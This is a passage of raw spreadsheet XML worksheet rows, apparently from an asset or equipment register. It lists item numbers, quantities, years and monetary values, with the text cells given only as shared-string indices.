    <row r="343" ht="14.25" customHeight="1" spans="2:13">
      <c r="B343" s="226" t="s">
        <v>1064</v>
      </c>
      <c r="C343" s="227"/>
      <c r="D343" s="228"/>
      <c r="E343" s="10"/>
      <c r="F343" s="14"/>
      <c r="G343" s="11"/>
      <c r="H343" s="11"/>
      <c r="I343" s="11"/>
      <c r="J343" s="91"/>
      <c r="K343" s="99">
        <v>0</v>
      </c>
      <c r="L343" s="10"/>
      <c r="M343" s="225"/>
    </row>
    <row r="344" ht="14.25" customHeight="1" spans="2:13">
      <c r="B344" s="11">
        <v>329</v>
      </c>
      <c r="C344" s="237" t="s">
        <v>1065</v>
      </c>
      <c r="D344" s="238" t="s">
        <v>1066</v>
      </c>
      <c r="E344" s="238" t="s">
        <v>1067</v>
      </c>
      <c r="F344" s="14"/>
      <c r="G344" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H344" s="11">
        <v>1</v>
      </c>
      <c r="I344" s="237" t="s">
        <v>229</v>
      </c>
      <c r="J344" s="91">
        <v>38000</v>
      </c>
      <c r="K344" s="99">
        <v>12000</v>
      </c>
      <c r="L344" s="238" t="s">
        <v>1068</v>
      </c>
      <c r="M344" s="225"/>
    </row>
    <row r="345" ht="14.25" customHeight="1" spans="2:13">
      <c r="B345" s="11">
        <v>330</v>
      </c>
      <c r="C345" s="237" t="s">
        <v>1069</v>
      </c>
      <c r="D345" s="238" t="s">
        <v>1070</v>
      </c>
      <c r="E345" s="10"/>
      <c r="F345" s="9" t="s">
        <v>1071</v>
      </c>
      <c r="G345" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H345" s="11">
        <v>1</v>
      </c>
      <c r="I345" s="237" t="s">
        <v>1072</v>
      </c>
      <c r="J345" s="91">
        <v>2580</v>
      </c>
      <c r="K345" s="99">
        <v>379.26</v>
      </c>
      <c r="L345" s="238" t="s">
        <v>1068</v>
      </c>
      <c r="M345" s="225"/>
    </row>
    <row r="346" ht="14.25" customHeight="1" spans="2:13">
      <c r="B346" s="11">
        <v>331</v>
      </c>
      <c r="C346" s="237" t="s">
        <v>1073</v>
      </c>
      <c r="D346" s="238" t="s">
        <v>315</v>
      </c>
      <c r="E346" s="238" t="s">
        <v>987</v>
      </c>
      <c r="F346" s="9"/>
      <c r="G346" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H346" s="11">
        <v>1</v>
      </c>
      <c r="I346" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J346" s="91">
        <v>41851</v>
      </c>
      <c r="K346" s="99">
        <v>7360</v>
      </c>
      <c r="L346" s="238" t="s">
        <v>1068</v>
      </c>
      <c r="M346" s="225"/>
    </row>
    <row r="347" ht="14.25" customHeight="1" spans="2:13">
      <c r="B347" s="11">
        <v>332</v>
      </c>
      <c r="C347" s="237" t="s">
        <v>1074</v>
      </c>
      <c r="D347" s="238" t="s">
        <v>977</v>
      </c>
      <c r="E347" s="238" t="s">
        <v>987</v>
      </c>
      <c r="F347" s="9"/>
      <c r="G347" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H347" s="11">
        <v>2</v>
      </c>
      <c r="I347" s="237" t="s">
        <v>273</v>
      </c>
      <c r="J347" s="91">
        <v>39616.63</v>
      </c>
      <c r="K347" s="99">
        <v>14720</v>
      </c>
      <c r="L347" s="238" t="s">
        <v>1068</v>
      </c>
      <c r="M347" s="225"/>
    </row>
    <row r="348" ht="14.25" customHeight="1" spans="2:13">
      <c r="B348" s="11">
        <v>333</v>
      </c>
      <c r="C348" s="237" t="s">
        <v>1075</v>
      </c>
      <c r="D348" s="238" t="s">
        <v>881</v>
      </c>
      <c r="E348" s="238" t="s">
        <v>1076</v>
      </c>
      <c r="F348" s="9" t="s">
        <v>882</v>
      </c>
      <c r="G348" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H348" s="11">
        <v>1</v>
      </c>
      <c r="I348" s="237" t="s">
        <v>310</v>
      </c>
      <c r="J348" s="91">
        <v>121700</v>
      </c>
      <c r="K348" s="99">
        <v>13800</v>
      </c>
      <c r="L348" s="238" t="s">
        <v>1068</v>
      </c>
      <c r="M348" s="225"/>
    </row>
    <row r="349" ht="14.25" customHeight="1" spans="2:13">
      <c r="B349" s="11">
        <v>334</v>
      </c>
      <c r="C349" s="237" t="s">
        <v>1077</v>
      </c>
      <c r="D349" s="238" t="s">
        <v>1019</v>
      </c>
      <c r="E349" s="238" t="s">
        <v>1078</v>
      </c>
      <c r="F349" s="9"/>
      <c r="G349" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H349" s="11">
        <v>1</v>
      </c>
      <c r="I349" s="237" t="s">
        <v>1079</v>
      </c>
      <c r="J349" s="91">
        <v>35000</v>
      </c>
      <c r="K349" s="99">
        <v>12512</v>
      </c>
      <c r="L349" s="238" t="s">
        <v>1068</v>
      </c>
      <c r="M349" s="225"/>
    </row>
    <row r="350" ht="14.25" customHeight="1" spans="2:13">
      <c r="B350" s="11">
        <v>335</v>
      </c>
      <c r="C350" s="237" t="s">
        <v>1080</v>
      </c>
      <c r="D350" s="238" t="s">
        <v>1081</v>
      </c>
      <c r="E350" s="238" t="s">
        <v>1082</v>
      </c>
      <c r="F350" s="9" t="s">
        <v>883</v>
      </c>
      <c r="G350" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H350" s="11">
        <v>2</v>
      </c>
      <c r="I350" s="237" t="s">
        <v>343</v>
      </c>
      <c r="J350" s="91">
        <v>808623</v>
      </c>
      <c r="K350" s="99">
        <v>156800</v>
      </c>
      <c r="L350" s="238" t="s">
        <v>1068</v>
      </c>
      <c r="M350" s="225"/>
    </row>
    <row r="351" ht="14.25" customHeight="1" spans="2:13">
      <c r="B351" s="11">
        <v>336</v>
      </c>
      <c r="C351" s="237" t="s">
        <v>1083</v>
      </c>
      <c r="D351" s="238" t="s">
        <v>977</v>
      </c>
      <c r="E351" s="238" t="s">
        <v>1084</v>
      </c>
      <c r="F351" s="9"/>
      <c r="G351" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H351" s="11">
        <v>1</v>
      </c>
      <c r="I351" s="237" t="s">
        <v>1085</v>
      </c>
      <c r="J351" s="91">
        <v>185750</v>
      </c>
      <c r="K351" s="99">
        <v>33600</v>
      </c>
      <c r="L351" s="238" t="s">
        <v>1068</v>
      </c>
      <c r="M351" s="225"/>
    </row>
    <row r="352" ht="14.25" customHeight="1" spans="2:13">
      <c r="B352" s="11">
        <v>337</v>
      </c>
      <c r="C352" s="237" t="s">
        <v>1086</v>
      </c>
      <c r="D352" s="238" t="s">
        <v>1087</v>
      </c>
      <c r="E352" s="238" t="s">
        <v>1088</v>
      </c>
      <c r="F352" s="9" t="s">
        <v>1089</v>
      </c>
      <c r="G352" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H352" s="11">
        <v>1</v>
      </c>
      <c r="I352" s="237" t="s">
        <v>1090</v>
      </c>
      <c r="J352" s="91">
        <v>4700.85</v>
      </c>
      <c r="K352" s="99">
        <v>1283.1</v>
      </c>
      <c r="L352" s="238" t="s">
        <v>1068</v>
      </c>
      <c r="M352" s="225"/>
    </row>
    <row r="353" ht="14.25" customHeight="1" spans="2:13">
      <c r="B353" s="11">
        <v>338</v>
      </c>
      <c r="C353" s="237" t="s">
        <v>1091</v>
      </c>
      <c r="D353" s="238" t="s">
        <v>1092</v>
      </c>
      <c r="E353" s="238" t="s">
        <v>1093</v>
      </c>
      <c r="F353" s="14"/>
      <c r="G353" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H353" s="11">
        <v>1</v>
      </c>
      <c r="I353" s="237" t="s">
        <v>1094</v>
      </c>
      <c r="J353" s="91">
        <v>6800</v>
      </c>
      <c r="K353" s="99">
        <v>1428</v>
      </c>
      <c r="L353" s="238" t="s">
        <v>1095</v>
      </c>
      <c r="M353" s="225"/>
    </row>
    <row r="354" ht="14.25" customHeight="1" spans="2:13">
      <c r="B354" s="11">
        <v>339</v>
      </c>
      <c r="C354" s="237" t="s">
        <v>1096</v>
      </c>
      <c r="D354" s="238" t="s">
        <v>1097</v>
      </c>
      <c r="E354" s="238" t="s">
        <v>1098</v>
      </c>
      <c r="F354" s="9" t="s">
        <v>1099</v>
      </c>
      <c r="G354" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H354" s="11"/>
      <c r="I354" s="237" t="s">
        <v>1100</v>
      </c>
      <c r="J354" s="91">
        <v>376800</v>
      </c>
      <c r="K354" s="99">
        <v>75600</v>
      </c>
      <c r="L354" s="238" t="s">
        <v>1095</v>
      </c>
      <c r="M354" s="225"/>
    </row>
    <row r="355" ht="14.25" customHeight="1" spans="2:13">
      <c r="B355" s="11">
        <v>340</v>
      </c>
      <c r="C355" s="237" t="s">
        <v>1101</v>
      </c>
      <c r="D355" s="238" t="s">
        <v>1102</v>
      </c>
      <c r="E355" s="10"/>
      <c r="F355" s="14"/>
      <c r="G355" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H355" s="11"/>
      <c r="I355" s="237" t="s">
        <v>1100</v>
      </c>
      <c r="J355" s="91">
        <v>65000</v>
      </c>
      <c r="K355" s="99">
        <v>12600</v>
      </c>
      <c r="L355" s="238" t="s">
        <v>1095</v>
      </c>
      <c r="M355" s="225"/>
    </row>
    <row r="356" ht="14.25" customHeight="1" spans="2:13">
      <c r="B356" s="11">
        <v>341</v>
      </c>
      <c r="C356" s="11"/>
      <c r="D356" s="10" t="s">
        <v>1103</v>
      </c>
      <c r="E356" s="10" t="s">
        <v>897</v>
      </c>
      <c r="F356" s="9" t="s">
        <v>1104</v>
      </c>
      <c r="G356" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H356" s="11">
        <v>1</v>
      </c>
      <c r="I356" s="11">
        <v>1997</v>
      </c>
      <c r="J356" s="91"/>
      <c r="K356" s="99">
        <v>3000</v>
      </c>
      <c r="L356" s="238" t="s">
        <v>1068</v>
      </c>
      <c r="M356" s="225"/>
    </row>
    <row r="357" ht="14.25" customHeight="1" spans="2:13">
      <c r="B357" s="11">
        <v>342</v>
      </c>
      <c r="C357" s="11"/>
      <c r="D357" s="10" t="s">
        <v>1105</v>
      </c>
      <c r="E357" s="10" t="s">
        <v>1106</v>
      </c>
      <c r="F357" s="9"/>
      <c r="G357" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H357" s="11">
        <v>1</v>
      </c>
      <c r="I357" s="11">
        <v>1997</v>
      </c>
      <c r="J357" s="91"/>
      <c r="K357" s="99">
        <v>1200</v>
      </c>
      <c r="L357" s="238" t="s">
        <v>1068</v>
      </c>
      <c r="M357" s="225"/>
    </row>
    <row r="358" ht="14.25" customHeight="1" spans="2:13">
      <c r="B358" s="11">
        <v>343</v>
      </c>
      <c r="C358" s="11"/>
      <c r="D358" s="10" t="s">
        <v>1107</v>
      </c>
      <c r="E358" s="10" t="s">
        <v>1108</v>
      </c>
      <c r="F358" s="9" t="s">
        <v>1109</v>
      </c>
      <c r="G358" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H358" s="11">
        <v>1</v>
      </c>
      <c r="I358" s="11">
        <v>2000</v>
      </c>
      <c r="J358" s="91"/>
      <c r="K358" s="99">
        <v>320</v>
      </c>
      <c r="L358" s="238" t="s">
        <v>1068</v>
      </c>
      <c r="M358" s="225"/>
    </row>
    <row r="359" ht="14.25" customHeight="1" spans="2:13">
      <c r="B359" s="11">
        <v>344</v>
      </c>
      <c r="C359" s="11"/>
      <c r="D359" s="10" t="s">
        <v>1110</v>
      </c>
      <c r="E359" s="10" t="s">
        <v>1111</v>
      </c>
      <c r="F359" s="9" t="s">
        <v>1112</v>
      </c>
      <c r="G359" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H359" s="11">
        <v>1</v>
      </c>
      <c r="I359" s="11">
        <v>2008</v>
      </c>
      <c r="J359" s="91"/>
      <c r="K359" s="99">
        <v>744</v>
      </c>
      <c r="L359" s="238" t="s">
        <v>1068</v>
      </c>
      <c r="M359" s="225"/>
    </row>
    <row r="360" ht="14.25" customHeight="1" spans="2:13">
      <c r="B360" s="11">
        <v>345</v>
      </c>
      <c r="C360" s="11"/>
      <c r="D360" s="10" t="s">
        <v>1113</v>
      </c>
      <c r="E360" s="10" t="s">
        <v>540</v>
      </c>
      <c r="F360" s="9" t="s">
        <v>1114</v>
      </c>
      <c r="G360" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H360" s="11">
        <v>1</v>
      </c>
      <c r="I360" s="11">
        <v>2005</v>
      </c>
      <c r="J360" s="91"/>
      <c r="K360" s="99">
        <v>736</v>
      </c>
      <c r="L360" s="238" t="s">
        <v>1068</v>
      </c>
      <c r="M360" s="225"/>
    </row>
    <row r="361" ht="14.25" customHeight="1" spans="2:13">
      <c r="B361" s="11">
        <v>346</v>
      </c>
      <c r="C361" s="11"/>
      <c r="D361" s="10" t="s">
        <v>1115</v>
      </c>
      <c r="E361" s="10" t="s">
        <v>1116</v>
      </c>
      <c r="F361" s="9" t="s">
        <v>499</v>
      </c>
      <c r="G361" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H361" s="11">
        <v>1</v>
      </c>
      <c r="I361" s="11">
        <v>2014</v>
      </c>
      <c r="J361" s="91"/>
      <c r="K361" s="99">
        <v>2268</v>
      </c>
      <c r="L361" s="238" t="s">
        <v>1068</v>
      </c>
      <c r="M361" s="225"/>
    </row>
    <row r="362" ht="14.25" customHeight="1" spans="2:13">
      <c r="B362" s="226" t="s">
        <v>1117</v>
      </c>
      <c r="C362" s="227"/>
      <c r="D362" s="228"/>
      <c r="E362" s="10"/>
      <c r="F362" s="14"/>
      <c r="G362" s="11"/>
      <c r="H362" s="11"/>
      <c r="I362" s="11"/>
      <c r="J362" s="91"/>
      <c r="K362" s="99">
        <v>0</v>
      </c>
      <c r="L362" s="10"/>
      <c r="M362" s="225"/>
    </row>
    <row r="363" ht="14.25" customHeight="1" spans="2:13">
      <c r="B363" s="11">
        <v>347</v>
      </c>
      <c r="C363" s="237" t="s">
        <v>1118</v>
      </c>
      <c r="D363" s="238" t="s">
        <v>1119</v>
      </c>
      <c r="E363" s="238" t="s">
        <v>1120</v>
      </c>
      <c r="F363" s="14"/>
      <c r="G363" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H363" s="11">
        <v>2</v>
      </c>
      <c r="I363" s="237" t="s">
        <v>1021</v>
      </c>
      <c r="J363" s="91">
        <v>570885</v>
      </c>
      <c r="K363" s="99">
        <v>95680</v>
      </c>
      <c r="L363" s="238" t="s">
        <v>1121</v>
      </c>
      <c r="M363" s="225"/>
    </row>
    <row r="364" ht="14.25" customHeight="1" spans="2:13">
      <c r="B364" s="11">
        <v>348</v>
      </c>
      <c r="C364" s="237" t="s">
        <v>1122</v>
      </c>
      <c r="D364" s="238" t="s">
        <v>1033</v>
      </c>
      <c r="E364" s="238" t="s">
        <v>1123</v>
      </c>
      <c r="F364" s="9" t="s">
        <v>1124</v>
      </c>
      <c r="G364" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H364" s="11">
        <v>16</v>
      </c>
      <c r="I364" s="237" t="s">
        <v>1125</v>
      </c>
      <c r="J364" s="91">
        <v>3526483.5</v>
      </c>
      <c r="K364" s="99">
        <v>784000</v>
      </c>
      <c r="L364" s="238" t="s">
        <v>1121</v>
      </c>
      <c r="M364" s="225"/>
    </row>
    <row r="365" ht="14.25" customHeight="1" spans="2:13">
      <c r="B365" s="11">
        <v>349</v>
      </c>
      <c r="C365" s="237" t="s">
        <v>1126</v>
      </c>
      <c r="D365" s="238" t="s">
        <v>1033</v>
      </c>
      <c r="E365" s="238" t="s">
        <v>1127</v>
      </c>
      <c r="F365" s="9"/>
      <c r="G365" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H365" s="11">
        <v>16</v>
      </c>
      <c r="I365" s="237" t="s">
        <v>1125</v>
      </c>
      <c r="J365" s="91">
        <v>3419163.55</v>
      </c>
      <c r="K365" s="99">
        <v>761600</v>
      </c>
      <c r="L365" s="238" t="s">
        <v>1121</v>
      </c>
      <c r="M365" s="225"/>
    </row>
    <row r="366" ht="14.25" customHeight="1" spans="2:13">
      <c r="B366" s="11">
        <v>350</v>
      </c>
      <c r="C366" s="237" t="s">
        <v>1128</v>
      </c>
      <c r="D366" s="238" t="s">
        <v>1129</v>
      </c>
      <c r="E366" s="238" t="s">
        <v>1130</v>
      </c>
      <c r="F366" s="9" t="s">
        <v>954</v>
      </c>
      <c r="G366" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H366" s="11">
        <v>1</v>
      </c>
      <c r="I366" s="237" t="s">
        <v>1125</v>
      </c>
      <c r="J366" s="91">
        <v>73192</v>
      </c>
      <c r="K366" s="99">
        <v>14560</v>
      </c>
      <c r="L366" s="238" t="s">
        <v>1121</v>
      </c>
      <c r="M366" s="225"/>
    </row>
    <row r="367" ht="14.25" customHeight="1" spans="2:13">
      <c r="B367" s="11">
        <v>351</v>
      </c>
      <c r="C367" s="237" t="s">
        <v>1131</v>
      </c>
      <c r="D367" s="238" t="s">
        <v>1132</v>
      </c>
      <c r="E367" s="238" t="s">
        <v>1133</v>
      </c>
      <c r="F367" s="9"/>
      <c r="G367" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H367" s="11">
        <v>1</v>
      </c>
      <c r="I367" s="237" t="s">
        <v>1125</v>
      </c>
      <c r="J367" s="91">
        <v>195980</v>
      </c>
      <c r="K367" s="99">
        <v>38080</v>
      </c>
      <c r="L367" s="238" t="s">
        <v>1121</v>
      </c>
      <c r="M367" s="225"/>
    </row>
    <row r="368" ht="14.25" customHeight="1" spans="2:13">
      <c r="B368" s="11">
        <v>352</v>
      </c>
      <c r="C368" s="237" t="s">
        <v>1134</v>
      </c>
      <c r="D368" s="238" t="s">
        <v>1135</v>
      </c>
      <c r="E368" s="238" t="s">
        <v>1133</v>
      </c>
      <c r="F368" s="9"/>
      <c r="G368" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H368" s="11">
        <v>1</v>
      </c>
      <c r="I368" s="237" t="s">
        <v>1125</v>
      </c>
      <c r="J368" s="91">
        <v>240752</v>
      </c>
      <c r="K368" s="99">
        <v>49280</v>
      </c>
      <c r="L368" s="238" t="s">
        <v>1121</v>
      </c>
      <c r="M368" s="225"/>
    </row>
    <row r="369" ht="14.25" customHeight="1" spans="2:13">
      <c r="B369" s="11">
        <v>353</v>
      </c>
      <c r="C369" s="237" t="s">
        <v>1136</v>
      </c>
      <c r="D369" s="238" t="s">
        <v>1137</v>
      </c>
      <c r="E369" s="238" t="s">
        <v>1138</v>
      </c>
      <c r="F369" s="9" t="s">
        <v>1139</v>
      </c>
      <c r="G369" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H369" s="11">
        <v>1</v>
      </c>
      <c r="I369" s="237" t="s">
        <v>1125</v>
      </c>
      <c r="J369" s="91">
        <v>122385</v>
      </c>
      <c r="K369" s="99">
        <v>26880</v>
      </c>
      <c r="L369" s="238" t="s">
        <v>1121</v>
      </c>
      <c r="M369" s="225"/>
    </row>
    <row r="370" ht="14.25" customHeight="1" spans="2:13">
      <c r="B370" s="11">
        <v>354</v>
      </c>
      <c r="C370" s="237" t="s">
        <v>1140</v>
      </c>
      <c r="D370" s="238" t="s">
        <v>1141</v>
      </c>
      <c r="E370" s="238" t="s">
        <v>1142</v>
      </c>
      <c r="F370" s="9" t="s">
        <v>1139</v>
      </c>
      <c r="G370" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H370" s="11">
        <v>1</v>
      </c>
      <c r="I370" s="237" t="s">
        <v>1125</v>
      </c>
      <c r="J370" s="91">
        <v>121811</v>
      </c>
      <c r="K370" s="99">
        <v>25760</v>
      </c>
      <c r="L370" s="238" t="s">
        <v>1121</v>
      </c>
      <c r="M370" s="225"/>
    </row>
    <row r="371" ht="14.25" customHeight="1" spans="2:13">
      <c r="B371" s="11">
        <v>355</v>
      </c>
      <c r="C371" s="237" t="s">
        <v>1143</v>
      </c>
      <c r="D371" s="238" t="s">
        <v>681</v>
      </c>
      <c r="E371" s="238" t="s">
        <v>682</v>
      </c>
      <c r="F371" s="14"/>
      <c r="G371" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H371" s="11">
        <v>5</v>
      </c>
      <c r="I371" s="237" t="s">
        <v>647</v>
      </c>
      <c r="J371" s="91">
        <v>264100</v>
      </c>
      <c r="K371" s="99">
        <v>272800</v>
      </c>
      <c r="L371" s="238" t="s">
        <v>1121</v>
      </c>
      <c r="M371" s="225"/>
    </row>
    <row r="372" ht="14.25" customHeight="1" spans="2:13">
      <c r="B372" s="11">
        <v>356</v>
      </c>
      <c r="C372" s="237" t="s">
        <v>1144</v>
      </c>
      <c r="D372" s="238" t="s">
        <v>681</v>
      </c>
      <c r="E372" s="238" t="s">
        <v>682</v>
      </c>
      <c r="F372" s="14"/>
      <c r="G372" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H372" s="11">
        <v>2</v>
      </c>
      <c r="I372" s="237" t="s">
        <v>647</v>
      </c>
      <c r="J372" s="91">
        <v>400000</v>
      </c>
      <c r="K372" s="99">
        <v>94240</v>
      </c>
      <c r="L372" s="238" t="s">
        <v>1121</v>
      </c>
      <c r="M372" s="225"/>
    </row>
    <row r="373" ht="14.25" customHeight="1" spans="2:13">
      <c r="B373" s="11">
        <v>357</v>
      </c>
      <c r="C373" s="237" t="s">
        <v>1145</v>
      </c>
      <c r="D373" s="238" t="s">
        <v>1146</v>
      </c>
      <c r="E373" s="10"/>
      <c r="F373" s="14"/>
      <c r="G373" s="11" t="s">
        <v>466</v>
      </c>
      <c r="H373" s="11">
        <v>1</v>
      </c>
      <c r="I373" s="237" t="s">
        <v>725</v>
      </c>
      <c r="J373" s="91">
        <v>5710000</v>
      </c>
      <c r="K373" s="99">
        <v>1289600</v>
      </c>
      <c r="L373" s="238" t="s">
        <v>1121</v>
      </c>
      <c r="M373" s="225"/>
    </row>
    <row r="374" ht="14.25" customHeight="1" spans="2:13">
      <c r="B374" s="11">
        <v>358</v>
      </c>
      <c r="C374" s="237" t="s">
        <v>1147</v>
      </c>
      <c r="D374" s="238" t="s">
        <v>1148</v>
      </c>
      <c r="E374" s="10"/>
      <c r="F374" s="14"/>
      <c r="G374" s="11"/>
      <c r="H374" s="11"/>
      <c r="I374" s="237" t="s">
        <v>612</v>
      </c>
      <c r="J374" s="91">
        <v>4194219.68</v>
      </c>
      <c r="K374" s="99">
        <v>320000</v>
      </c>
      <c r="L374" s="238" t="s">
        <v>1121</v>
      </c>
      <c r="M374" s="225"/>
    </row>
    <row r="375" ht="14.25" customHeight="1" spans="2:13">
      <c r="B375" s="11">
        <v>359</v>
      </c>
      <c r="C375" s="237" t="s">
        <v>1149</v>
      </c>
      <c r="D375" s="238" t="s">
        <v>1150</v>
      </c>
      <c r="E375" s="238" t="s">
        <v>821</v>
      </c>
      <c r="F375" s="14"/>
      <c r="G375" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H375" s="11">
        <v>8</v>
      </c>
      <c r="I375" s="237" t="s">
        <v>472</v>
      </c>
      <c r="J375" s="91">
        <v>16250</v>
      </c>
      <c r="K375" s="99">
        <v>56320</v>
      </c>
      <c r="L375" s="238" t="s">
        <v>1151</v>
      </c>
      <c r="M375" s="225"/>
    </row>
    <row r="376" ht="14.25" customHeight="1" spans="2:13">
      <c r="B376" s="11">
        <v>360</v>
      </c>
      <c r="C376" s="11"/>
      <c r="D376" s="10" t="s">
        <v>1152</v>
      </c>
      <c r="E376" s="10" t="s">
        <v>1153</v>
      </c>
      <c r="F376" s="9" t="s">
        <v>1154</v>
      </c>
      <c r="G376" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H376" s="11">
        <v>1</v>
      </c>
      <c r="I376" s="11">
        <v>2008</v>
      </c>
      <c r="J376" s="91"/>
      <c r="K376" s="99">
        <v>69440</v>
      </c>
      <c r="L376" s="238" t="s">
        <v>1121</v>
      </c>
      <c r="M376" s="225"/>
    </row>
    <row r="377" ht="14.25" customHeight="1" spans="2:13">
      <c r="B377" s="11">
        <v>361</v>
      </c>
      <c r="C377" s="11"/>
      <c r="D377" s="10" t="s">
        <v>1155</v>
      </c>
      <c r="E377" s="10" t="s">
        <v>1156</v>
      </c>
      <c r="F377" s="9" t="s">
        <v>1157</v>
      </c>
      <c r="G377" s="88" t="s">
        <v>223</v>
      </c>
      <c r="H377" s="11">
        <v>1</v>
      </c>
      <c r="I377" s="11">
        <v>2008</v>
      </c>
      <c r="J377" s="91"/>
      <c r="K377" s="99">
        <v>45384</v>
      </c>
      <c r="L377" s="238" t="s">
        <v>1121</v>
      </c>
      <c r="M377" s="225"/>
    </row>
    <row r="378" ht="14.25" customHeight="1" spans="2:13">
      <c r="B378" s="11">
        <v>362</v>
      </c>
      <c r="C378" s="11"/>
      <c r="D378" s="10" t="s">
        <v>1158</v>
      </c>
      <c r="E378" s="10" t="s">
        <v>1063</v>
      </c>
      <c r="F378" s="9" t="s">
        <v>1159</v>
      </c>
      <c r="G378" s="88" t="s">
        <v>466</v>
      </c>
      <c r="H378" s="11">
        <v>3</v>
      </c>
      <c r="I378" s="11">
        <v>2008</v>
      </c>
      <c r="J378" s="91"/>
      <c r="K378" s="99">
        <v>29760</v>
      </c>
      <c r="L378" s="238" t="s">
        <v>1121</v>
      </c>
      <c r="M378" s="225"/>
    </row>
    <row r="379" ht="14.25" customHeight="1" spans="2:13">
      <c r="B379" s="226" t="s">
        <v>1160</v>
      </c>
      <c r="C379" s="227"/>
      <c r="D379" s="228"/>
      <c r="E379" s="10"/>
      <c r="F379" s="14"/>
      <c r="G379" s="11"/>
      <c r="H379" s="11"/>
      <c r="I379" s="11"/>
      <c r="J379" s="91"/>
      <c r="K379" s="99">
        <v>0</v>
      </c>
      <c r="L379" s="10"/>
      <c r="M379" s="225"/>
    </row>
    <row r="380" ht="14.25" customHeight="1" spans="2:13">
      <c r="B380" s="11">
        <v>363</v>
      </c>
      <c r="C380" s="237" t="s">
        <v>1161</v>
      </c>
      <c r="D380" s="238" t="s">
        <v>1162</v>
      </c>
      <c r="E380" s="238" t="s">
        <v>1163</v>
      </c>
      <c r="F380" s="14"/>
      <c r="G380" s="11" t="s">
        <v>507</v>
      </c>
      <c r="H380" s="11">
        <v>4</v>
      </c>
      <c r="I380" s="237" t="s">
        <v>1035</v>
      </c>
      <c r="J380" s="91">
        <v>160000</v>
      </c>
      <c r="K380" s="99">
        <v>27600</v>
      </c>
      <c r="L380" s="238" t="s">
        <v>1164</v>
      </c>
      <c r="M380" s="225"/>
    </row>
    <row r="381" ht="14.25" customHeight="1" spans="2:13">
      <c r="B381" s="11">
        <v>364</v>
      </c>
      <c r="C381" s="237" t="s">
        <v>1165</v>
      </c>
      <c r="D381" s="238" t="s">
        <v>1166</v>
      </c>
      <c r="E381" s="238" t="s">
        <v>1167</v>
      </c>
      <c r="F381" s="14"/>
      <c r="G381" s="11" t="s">
        <v>507</v>
      </c>
      <c r="H381" s="11">
        <v>2</v>
      </c>
      <c r="I381" s="237" t="s">
        <v>1100</v>
      </c>
      <c r="J381" s="91">
        <v>99575</v>
      </c>
      <c r="K381" s="99">
        <v>162240</v>
      </c>
      <c r="L381" s="238" t="s">
        <v>1164</v>
      </c>
      <c r="M381" s="225"/>
    </row>
    <row r="382" ht="14.25" customHeight="1" spans="2:13">
      <c r="B382" s="11">
        <v>365</v>
      </c>
      <c r="C382" s="237" t="s">
        <v>1168</v>
      </c>
      <c r="D382" s="238" t="s">
        <v>1169</v>
      </c>
      <c r="E382" s="238" t="s">
        <v>1170</v>
      </c>
      <c r="F382" s="14"/>
      <c r="G382" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H382" s="11">
        <v>2</v>
      </c>
      <c r="I382" s="237" t="s">
        <v>1171</v>
      </c>
      <c r="J382" s="91">
        <v>8400</v>
      </c>
      <c r="K382" s="99">
        <v>1881.6</v>
      </c>
      <c r="L382" s="238" t="s">
        <v>1164</v>
      </c>
      <c r="M382" s="225"/>
    </row>
    <row r="383" ht="14.25" customHeight="1" spans="2:13">
      <c r="B383" s="11">
        <v>366</v>
      </c>
      <c r="C383" s="237" t="s">
        <v>1172</v>
      </c>
      <c r="D383" s="238" t="s">
        <v>1173</v>
      </c>
      <c r="E383" s="10"/>
      <c r="F383" s="14"/>
      <c r="G383" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H383" s="11">
        <v>1</v>
      </c>
      <c r="I383" s="237" t="s">
        <v>1174</v>
      </c>
      <c r="J383" s="91">
        <v>6666.67</v>
      </c>
      <c r="K383" s="99">
        <v>1632</v>
      </c>
      <c r="L383" s="238" t="s">
        <v>1164</v>
      </c>
      <c r="M383" s="225"/>
    </row>
    <row r="384" ht="14.25" customHeight="1" spans="2:13">
      <c r="B384" s="11">
        <v>367</v>
      </c>
      <c r="C384" s="237" t="s">
        <v>1175</v>
      </c>
      <c r="D384" s="238" t="s">
        <v>1176</v>
      </c>
      <c r="E384" s="238" t="s">
        <v>1177</v>
      </c>
      <c r="F384" s="14"/>
      <c r="G384" s="11" t="s">
        <v>223</v>
      </c>
      <c r="H384" s="11">
        <v>1</v>
      </c>
      <c r="I384" s="237" t="s">
        <v>432</v>
      </c>
      <c r="J384" s="91">
        <v>66666.67</v>
      </c>
      <c r="K384" s="99">
        <v>19008</v>
      </c>
      <c r="L384" s="238" t="s">
        <v>1164</v>
      </c>
      <c r="M384" s="225"/>
    </row>
    <row r="385" ht="14.25" customHeight="1" spans="2:13">
      <c r="B385" s="11">
        <v>368</v>
      </c>
      <c r="C385" s="237" t="s">
        <v>1178</v>
      </c>
      <c r="D385" s="238" t="s">
        <v>1179</v>
      </c>
      <c r="E385" s="238" t="s">
        <v>1180</v>
      </c>
      <c r="F385" s="9" t="s">
        <v>1181</v>
      </c>
